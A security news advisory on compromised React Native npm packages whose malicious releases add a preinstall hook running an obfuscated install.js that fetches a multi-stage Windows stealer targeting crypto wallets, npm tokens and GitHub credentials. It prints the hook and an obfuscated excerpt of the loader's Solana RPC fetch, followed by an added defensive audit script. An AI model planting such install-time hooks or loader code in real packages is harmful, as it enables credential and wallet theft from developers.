The compromised releases inject an install-time loader that silently downloads and executes a multi-stage Windows credential and cryptocurrency stealer. Developers trigger the infection simply by running a routine npm installation.
The threat actor compromised packages published by AstrOOnauta and released malicious versions within minutes of each other.
The attack replaced clean versions with infected updates that share a byte-identical malicious payload.
| Package Name | Clean Version | Malicious Version | Monthly Downloads |
|---|---|---|---|
| react-native-international-phone-number | 0.11.7 | 0.11.8 | ~92,000 |
| react-native-country-select | 0.3.9 | 0.3.91 | ~42,000 |
According to Aikido, the malicious code relies on a new preinstall script added to the package’s `package.json`. npm runs this script automatically before the package itself is installed, so no application code has to be imported for the infection to trigger.

Both malicious releases add the same package lifecycle hook:

```json
"scripts": {
  "preinstall": "node install.js"
}
```

The heavily obfuscated `install.js` first contacts a Solana remote procedure call (RPC) endpoint to retrieve a transaction memo containing a hidden web link for the second stage.
The original shipped installer shows the Solana RPC fetch directly (excerpt of the obfuscated sample, reproduced as-is):

```javascript
let y = await fetch(S, {
  'method': e(0x45b, 'nSeb', 0x48f, 0x42b),
  'headers': M,
  'body': JSON[d(0x473, 'kjpv', 0x42d, 0x471)]({
    'jsonrpc': e(0x42c, ')qo^', 0x477, 0x425),
    'id': 0x1,
    'method': 'getSignatu' + e(0x441, 'PhAy', 0x42c, 0x45e) + d(0x4bb, '6bCJ', 0x4b3, 0x4d3),
    'params': [H[d(0x50d, '%Rah', 0x527, 0x4f7)](), t]
  })
});
```

Once downloaded, the second stage provides the necessary decryption keys to unlock the final Windows-focused stealer.
This final stage establishes persistence on the victim’s machine by modifying scheduled tasks and registry keys. To hide its tracks, the malware uses a Google Calendar URL as an extra layer of indirection to fetch its final instructions.
The malware actively checks the victim’s system environment, including language settings and time zones, to ensure the victim does not reside in Russia.
If it detects signals like “ru_RU” or a Russian timezone, the malware silently exits. This geographic filtering is a common evasion tactic used by Russian-speaking threat actors.
If the system passes the location check, the payload searches the victim’s application data for Chromium and Firefox browser profiles.
It explicitly targets extensions for MetaMask, Phantom, Trust Wallet, and several other cryptocurrency wallets. It also executes system commands to steal authenticated npm registry tokens and GitHub credentials.
Developers using these packages should audit their environments immediately.
The recommended remediation is to pin dependencies to the last known clean versions and rotate any exposed credentials.
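The following script is an added example (not code from the article, Aikido, or the affected packages) showing how a defender can act on the two points above: enumerate installed `package.json` manifests, flag the malicious versions from the table plus any lifecycle hook that executes code at install time, and emit an npm `overrides` block that pins the affected packages back to the last clean versions. It assumes npm 8.3 or later for `overrides` support; the sample manifests are constructed for illustration, and the helper that reads `node_modules` is only exercised when a project root is passed on the command line.

```javascript
// Added example: audit package manifests for install-time hooks and the known-bad
// versions, then suggest npm "overrides" pinning to the clean releases.
// Version data comes from the article's table; sample manifests are constructed.

const KNOWN_BAD = {
  'react-native-international-phone-number': { bad: ['0.11.8'], clean: '0.11.7' },
  'react-native-country-select': { bad: ['0.3.91'], clean: '0.3.9' },
};

// Script names npm executes during installation: pre/install/postinstall for every
// dependency, prepare for the root package and git dependencies.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Return findings for an array of package.json-like objects ({name, version, scripts}).
function auditManifests(manifests) {
  const findings = [];
  for (const m of manifests) {
    const entry = KNOWN_BAD[m.name];
    if (entry && entry.bad.includes(m.version)) {
      findings.push({ name: m.name, version: m.version,
        kind: 'known-malicious-version', detail: `pin to ${entry.clean}` });
    }
    const scripts = m.scripts || {};
    for (const hook of INSTALL_HOOKS) {
      if (typeof scripts[hook] === 'string') {
        findings.push({ name: m.name, version: m.version,
          kind: 'install-hook', detail: `${hook}: ${scripts[hook]}` });
      }
    }
  }
  return findings;
}

// Build the "overrides" object for package.json that forces the clean versions.
function buildOverrides(findings) {
  const overrides = {};
  for (const f of findings) {
    if (f.kind === 'known-malicious-version') overrides[f.name] = KNOWN_BAD[f.name].clean;
  }
  return overrides;
}

// Constructed sample manifests: the two compromised packages, one benign package with
// no install hook, and one benign native package whose postinstall is expected.
const SAMPLE_MANIFESTS = [
  { name: 'react-native-international-phone-number', version: '0.11.8',
    scripts: { preinstall: 'node install.js' } },
  { name: 'react-native-country-select', version: '0.3.91',
    scripts: { preinstall: 'node install.js' } },
  { name: 'example-pure-js-lib', version: '1.0.0', scripts: { test: 'jest' } },
  { name: 'example-native-addon', version: '2.1.0', scripts: { postinstall: 'node-gyp rebuild' } },
];

// Read every node_modules/<pkg>/package.json (scoped packages included) under a project root.
function readInstalledManifests(root) {
  const fs = require('fs');
  const path = require('path');
  const out = [];
  const nm = path.join(root, 'node_modules');
  if (!fs.existsSync(nm)) return out;
  for (const dir of fs.readdirSync(nm)) {
    const candidates = dir.startsWith('@')
      ? fs.readdirSync(path.join(nm, dir)).map((s) => path.join(nm, dir, s))
      : [path.join(nm, dir)];
    for (const pkgDir of candidates) {
      const pj = path.join(pkgDir, 'package.json');
      if (!fs.existsSync(pj)) continue;
      try { out.push(JSON.parse(fs.readFileSync(pj, 'utf8'))); } catch (e) { /* skip unreadable manifest */ }
    }
  }
  return out;
}

// Usage: node audit.js [project-root]; without an argument the constructed samples are used.
if (typeof require !== 'undefined' && require.main === module) {
  const manifests = process.argv[2] ? readInstalledManifests(process.argv[2]) : SAMPLE_MANIFESTS;
  const findings = auditManifests(manifests);
  for (const f of findings) console.log(`${f.kind}\t${f.name}@${f.version}\t${f.detail}`);
  console.log('suggested package.json "overrides":', JSON.stringify(buildOverrides(findings), null, 2));
}
```

Install hooks are legitimate for packages that compile native code, so the `install-hook` findings are a review list rather than verdicts; the `known-malicious-version` findings are the ones that warrant immediate removal, credential rotation, and adding the generated `overrides` block to the project's `package.json` before reinstalling.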
The post Credential-Stealing npm Malware Found In Popular React Native Packages appeared first on Cyber Security News.